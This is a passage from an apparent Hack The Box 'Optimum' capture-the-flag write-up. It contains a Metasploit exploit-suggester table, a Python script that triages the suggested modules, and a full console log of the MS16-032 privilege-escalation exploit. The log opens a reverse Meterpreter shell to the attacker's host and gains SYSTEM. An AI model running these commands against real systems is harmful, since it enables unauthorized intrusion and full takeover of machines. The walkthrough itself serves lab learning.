23 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows Server 2012 R2 (6.3 Build 9600). is not vulnerable
24 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
25 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
26 exploit/windows/local/ms14_058_track_popup_menu No The target is not exploitable.
27 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
28 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
29 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
30 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
31 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
32 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
33 exploit/windows/local/ms_ndproxy No The target is not exploitable.
34 exploit/windows/local/novell_client_nicm No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
36 exploit/windows/local/ntusermndragover No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ppr_flatten_rec No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
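An added example (not from the issue and not Metasploit code): a small Python triage of the suggester table above against what winPEAS already told us. Of the five "Yes" rows, three are UAC bypasses (bypassuac_eventvwr, bypassuac_sluihijack, tokenmagic); a UAC bypass only turns a filtered administrator token back into a full one, so it does nothing for kostas, who per the winPEAS output is only in Users. cve_2020_0787's own description says it needs the Update Session Orchestrator service, which exists only on Windows 10 / Server 2016 and later, not on this 6.3 build. That leaves ms16_032, whose description requires PowerShell 2.0 or later and two or more cores, both of which winPEAS confirms (PowerShell v5 Version 4.0, ProcessorCount 2). The host facts are read from the winPEAS run; the rule table is this note's own and is not a feature of the suggester.

```python
"""Triage of post/multi/recon/local_exploit_suggester output against facts
gathered from winPEAS.  Added example: the rules encode the preconditions the
module descriptions above state, not anything the suggester checks itself."""
import re
from dataclasses import dataclass

# Rows copied from the suggester run against 10.10.10.8 (shortened to eight rows).
SUGGESTER_OUTPUT = """\
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
4 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
5 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
8 exploit/windows/local/always_install_elevated No The target is not exploitable.
22 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
"""

ROW = re.compile(r"^\s*\d+\s+(exploit/\S+)\s+(Yes|No)\s+(.*)$")


@dataclass(frozen=True)
class HostFacts:
    in_administrators: bool  # winPEAS "Current groups" / "|->Groups"
    nt_version: float        # winPEAS "CurrentVersion" (6.3 = Server 2012 R2 / 8.1)
    cores: int               # winPEAS "ProcessorCount"
    powershell: float        # winPEAS "PowerShell v5 Version"


# Values read from the winPEAS systeminfo/userinfo output above.
OPTIMUM = HostFacts(in_administrators=False, nt_version=6.3, cores=2, powershell=4.0)


def parse_candidates(text: str) -> list[tuple[str, str]]:
    """Return (module, check result) for every row the suggester marked 'Yes'."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m and m.group(2) == "Yes":
            rows.append((m.group(1), m.group(3)))
    return rows


def triage(module: str, check_result: str, host: HostFacts) -> tuple[str, str]:
    """Decide 'try' or 'skip', with the reason, from the module's stated preconditions."""
    name = module.rsplit("/", 1)[-1]
    if "bypassuac" in name or name == "tokenmagic":
        if not host.in_administrators:
            return "skip", "UAC bypass: only elevates a member of Administrators"
        return "try", "UAC bypass usable from an admin's medium-integrity token"
    if name.startswith("cve_2020_0787"):
        if host.nt_version < 10.0:
            return "skip", "needs Update Session Orchestrator (Windows 10 / Server 2016+)"
        return "try", check_result
    if name.startswith("ms16_032"):
        if host.cores < 2 or host.powershell < 2.0:
            return "skip", "needs PowerShell 2.0+ and two or more CPU cores"
        return "try", "preconditions met; " + check_result
    return "try", "no extra rule; " + check_result


def triage_all(text: str, host: HostFacts) -> dict[str, tuple[str, str]]:
    return {mod: triage(mod, res, host) for mod, res in parse_candidates(text)}


def worth_trying(text: str, host: HostFacts) -> list[str]:
    return [m for m, (decision, _) in triage_all(text, host).items() if decision == "try"]


if __name__ == "__main__":
    for mod, (decision, why) in triage_all(SUGGESTER_OUTPUT, OPTIMUM).items():
        print(f"{decision:4} {mod.rsplit('/', 1)[-1]}: {why}")
```

"The service is running, but could not be validated" means the check only confirmed the Secondary Logon service exists, not that the MS16-032 patch is missing; the hotfix list winPEAS printed is the place to confirm that before burning an attempt.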
exploit/windows/local/ms16_032_secondary_logon_handle_privesc looks usable (it says privesc, so privilege escalation can be attempted).
Privilege escalation succeeded. I thought port 4444 couldn't be used because the first session is using it, but somehow it worked.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.23.73.202 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\GhMiEXc.ps1...
[*] Compressing script contents...
[+] Compressed size: 3745
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2544
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $op4o = [Ntdll]::NtImpersonateThread($kQVm, $kQVm, [ref]$l1Xt)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (l1Xt:VariablePath) [], RuntimeException
+ FullyQualifiedErrorId : NonExistingVariableReference
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateToken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $op4o = [Advapi32]::DuplicateToken($iIFah, 2, [ref]$jp5L)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
eMoz6z81OVtq3XXeh3tjzhNNnZZyZjZR
[+] Executed on target machine.
[*] Sending stage (176198 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.16.3:4444 -> 10.10.10.8:49167) at 2024-03-05 00:21:11 +0900
[+] Deleted C:\Users\kostas\AppData\Local\Temp\GhMiEXc.ps1
meterpreter > shell
Process 1780 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
root.txt is in C:\Users\Administrator\Desktop.
https://app.hackthebox.com/machines/Optimum